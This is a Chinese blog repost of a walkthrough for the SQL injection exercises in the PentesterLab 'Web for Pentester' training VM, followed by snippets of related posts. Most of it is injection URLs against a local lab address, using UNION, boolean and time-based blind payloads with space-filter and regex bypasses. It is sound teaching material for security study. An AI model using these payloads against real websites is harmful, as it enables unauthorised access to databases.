【渗透测试学习平台】 web for pentester -2.SQL注入

最新推荐文章于 2024-08-28 11:05:19 发布
最新推荐文章于 2024-08-28 11:05:19 发布
阅读量439 收藏 1
点赞数
文章标签: php 数据库
原文链接:http://www.cnblogs.com/xiaozi/p/5688969.html
版权

Example 1

字符类型的注入,无过滤

http://192.168.91.139/sqli/example1.php?name=root 

http://192.168.91.139/sqli/example1.php?name=root' and 1=1%23

http://192.168.91.139/sqli/example1.php?name=root' and 1=2%23

http://192.168.91.139/sqli/example1.php?name=root' union select 1,2,3,4,5%23

 

Example 2

与example1差不多,过滤了空格,语句中存现空格就会报错

mysql注入绕过空格过滤的方法:

1、水平制表(HT) url编码:%09

2、注释绕过空格   /*注释*/

3、括号绕过空格的方法,在time based盲注中

        index.php?id=(sleep(ascii(mid(user()from(2)for(1)))=109)) 

特点:1) 既没有用到逗号、大小于符号 2) 也没有使用空格 却可以完成数据的猜解工作!

 

http://192.168.91.139/sqli/example2.php?name=root'%09and%091=1%23

http://192.168.91.139/sqli/example2.php?name=root'%09and%091=2%23

http://192.168.91.139/sqli/example2.php?name=root'/**/union/**/select/**/1,2,3,4,5%23

 

Example 3

在example的基础上,\s匹配任何空白字符,包括空格、制表符、换页符等,全部过滤掉

可以使用example2中 /*注释*/ 绕过过滤

http://192.168.91.139/sqli/example3.php?name=root'/**/union/**/select/**/1,2,3,4,5%23

 

Example 4

数值型的注入,过滤了单引号等,对数值型无效

http://192.168.91.139/sqli/example4.php?id=3 union select 1,2,3,4,5

 

Example 5

与前面类似,以一个数字开头的,后面可添加构造的sql语句进行攻击测试

http://192.168.91.139/sqli/example5.php?id=2 and 1=1--

http://192.168.91.139/sqli/example5.php?id=2 and 1=2--

 

Example 6

正则表达式值确保了参数id是以一个数字结尾的.他不能确保id参数的开头是合法的.

你可以变通一下前面说到的检测方法.你只需要在你的payload后面加上数字.比如你可以这样:1 or 1=1 # 123. 

http://192.168.91.139/sqli/example6.php?id=2 union select 1,2,3,4,5 %23 123

 

 

Example 7

解法一:

换行 \n的url编码是%0a

 这边纠结了好久,最终使用了-- %23 才能注释掉后面语句

http://192.168.91.139/sqli/example7.php?id=2 and if(ascii(substring(user(),1,1))=112,sleep(1),0)--%23%0a123

 

解法二:

http://192.168.91.139/sqli/example7.php?id=' and 1=1 %0a1%0a' union select version(),2,3,4,5 %23

Example 8

order by `name`   报错注入出不来,用了时间盲注一个一个猜解

http://192.168.91.139/sqli/example8.php
?order=name` xor if(ascii(substring(user(),1,1))=111,sleep(5),0)%23

 

Example 9

 与 example8类似,可以通过时间盲注进行逐一猜解

http://192.168.91.139/sqli/example9.php?order=1 xor if(ascii(substring(user(),1,1))=112,sleep(5),0)%23

最后

欢迎关注个人微信公众号:Bypass--,每周一篇原创高质量的干货。 

 

参考链接:

Web for Pentester II  :https://pentesterlab.com/exercises/web_for_pentester/course

Web渗透测试攻略 [三]: http://www.2cto.com/Article/201401/275482.html

Web渗透测试攻略[四]:http://www.tuicool.com/articles/EFV3UzF

Web渗透测试攻略[五]:http://www.tuicool.com/articles/Iza63eM

转载于:https://www.cnblogs.com/xiaozi/p/5688969.html

an0708
关注
Web for pentester靶机sql注入
Long_gone的博客
10-22 728
Example 1 这关进来以后是这样的: 从这个页面中我们可以得到name就是注入点,所以就先判断出它的闭合方式,经过尝试发现它是由单引号闭合的,知道闭合方式以后就开始判断它的字段数了: ' order by 5 --+ 经过尝试,确定它的字段数为5,然后就可以开始注入了,使用最常用的联合注入即可: ' union select 1,2,3,4,5 --+ ' union selec...
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
墨鱼菜鸡
07-11 2426
操作系统:https://zhuanlan.zhihu.com/p/162865015 1、基于 Windows、Linux、Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali:https://www.kali.org/get-kali/Parrot Security OS:Parrot Securitybackbox:ht...
Web for Pentester II安装时网络模式选择
beta_safe的博客
02-17 247
物理机一直访问不了Web for Pentester II虚拟机环境,偶然参考以下内容,把虚拟机设置为桥接模式,竟然就搞定了!如果物理机是自动分配,就说明物理机本身处于子网(如IP为192.168.*.*),那可以选用桥接方式,虚拟机设为同网段的一个未用IP。如果物理机为固定MAC绑定IP,那就用NAT模式,虚拟机也选用DHCP自动分配。...
学习web渗透测试国内、国外在线网站_渗透测试学习网站
最新发布
shanguicsdn111的博客
08-28 1501
mutillidaemutillidae是一个免费,开源的Web应用程序,提供专门被允许的安全测试和入侵的Web应用程序。安全资讯媒体,涉及移动安全、网站安全、终端安全、无线安全、工控安全、物联网安全、WEB安全、系统安全、网络安全、区块链安全等,内容较深入,需要一定基础。国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际环境的实验平台。是一个合法和安全的测试黑客技能的网站,并包含黑客资讯、文章、论坛和教程,旨在帮助你学习黑客技术。
Web for Pentester -- sql注入
weixin_30832143的博客
01-11 310
1. 不做任何过滤 2. 对空格进行了过滤,可以利用/*注释*/、换行符%0A、tab键%09、回车%0d、%0c …… 3. 过滤了空白字符,就是换行符这些无法绕过,注释、括号仍然可用。 4. 数字型注入,没过滤 5. 没看出做了啥策略。 6. 只能以数字开头和结尾 7. 8.时间盲注 9.时...
Web for Pentester SQL sql注入靶场
weixin_45715461的博客
05-22 730
Web for Pentester SQL sql注入靶场
Web for pentester_writeup之SQL injections篇
ditanji3425的博客
08-07 441
Web for pentester_writeup之SQL injections篇 SQL injections(SQL注入) Example 1 测试参数,添加 and '1'='1, 'and '1'='2判断存在注入 猜解查询列数(%23为#号的URL编码,注释原有结构的单引号 http://192.168.219.136/sqli/example1.php?name=roo...
Web for Pentester II练习题解
Shinpachi8的博客
01-14 2353
最近一直在找mongodb的注入练习,结果在penetsterlab上找到了。发现了其中的web for pentester 2, 其实我并没有做过第一版。有兴趣同学可以试着做做这一套练习包括:SQL注入,认证,授权,验证码, 覆盖属性,随机数问题,mongodb注入几部分。其中除随机数没有做出来,其他的都有解法。在pentesterlab上下载iso镜像直接用在虚拟机打开就可以了。我用的是virtualbox。
Web渗透测试入门:Web for Pentester平台详解
"web_for_pentester.pdf 是一个由安全研究者..."web_for_pentester.pdf" 提供了一个深入学习Web渗透测试的框架,涵盖了从基础概念到高级技术的广泛知识,对于任何想要提升Web安全技能的人员来说,都是一个宝贵的资源。
web_for_pentester.pdf
04-02
Web for pentester是一款由安全研究者Louis Nyffenegger开发的渗透测试平台,旨在帮助用户掌握Web漏洞检测的实战技能。从给出的部分内容来看,这份材料涉及了Web渗透测试的基础知识,Web安全模型,常见的Web安全风险...
freecodecamp-pentester-course
03-10
《freecodecamp-pentester-course》是针对网络安全与渗透测试的一个学习课程,主要聚焦于JavaScript技术的应用。在这个课程中,你将深入理解如何利用JavaScript进行安全评估和防护,为成为一名合格的渗透测试工程师...
WEB渗透测试平台
07-06
链接:https://pan.baidu.com/s/1QFrJeL6tq5iaf8AfXxYJCw 提取码:dm1v 自己集成的测试平台,供同行使用。集成的平台所有权归原作者所有,致以感谢。 包括: 技术参考 OWASP sql注入资料 w3schoo/runoob/linux等网站 metasploit TCP/IP等学习和参考资料。 集成平台 DVWA multilidae MCIR sqli-labs pikachu BWVS btslab xssplatform phpMyAdmin blueLotus 推荐书籍 各种参考详细书目。 因涉及产权以上仅提供WEB测试平台,书籍不提供。 有问题请留言。
Web_for_Pentester_I之SQL注入
贝隆的博客
02-06 610
Web_for_Pentester_I之SQL注入
1.sql注入-----Pentesterlab2
qwsn
11-04 1856
Example 1: 输入:' SELECT * FROM users WHERE username=’’’ AND password=’’
sql注入判断技巧
u012080723的专栏
12-01 589
对于数值型: 1.常用的一条time based盲注语句:     http://www.xxx.com/index.php?id=(sleep(ascii(mid(user()from(2)for(1)))=109)) 这条语句是猜解user()第二个字符的ascii码是不是109,若是109,则页面加载将延迟。它: 1) 既没有用到逗号、大小于符号 2) 也没有使用空格 却可以
Web for Pentester SQL注入example 1-7 答案解析
u011975363的专栏
04-16 5187
pentester lab镜像下载地址为https://pentesterlab.com/exercises/web_for_pentester/course,下载.iso镜像,在虚拟机中搭建,查看虚拟机ip,在浏览器中输入虚拟机Ip,即可看到练习题界面,sql注入的界面如图所示: 一、example 1 1、首先判断是否存在注入点及注入类型 由此可知,存在字符型注入,且没有设置...
Web for Pentester 阅读笔记(2)
kezhen的专栏
06-07 2460
HTTP协议 HTTP是Web的基本协议,对该
Hack The Box,一款有意思的渗透测试平台
阿道夫的博客
02-03 1510
Hack TheBox是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中一些模拟真实场景,其中一些更倾向于CTF风格的挑战。Hack The Box还提供了Rank机制来作为我们挑战的动力,通过通关靶场来去获取积分提高自己的排名。1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值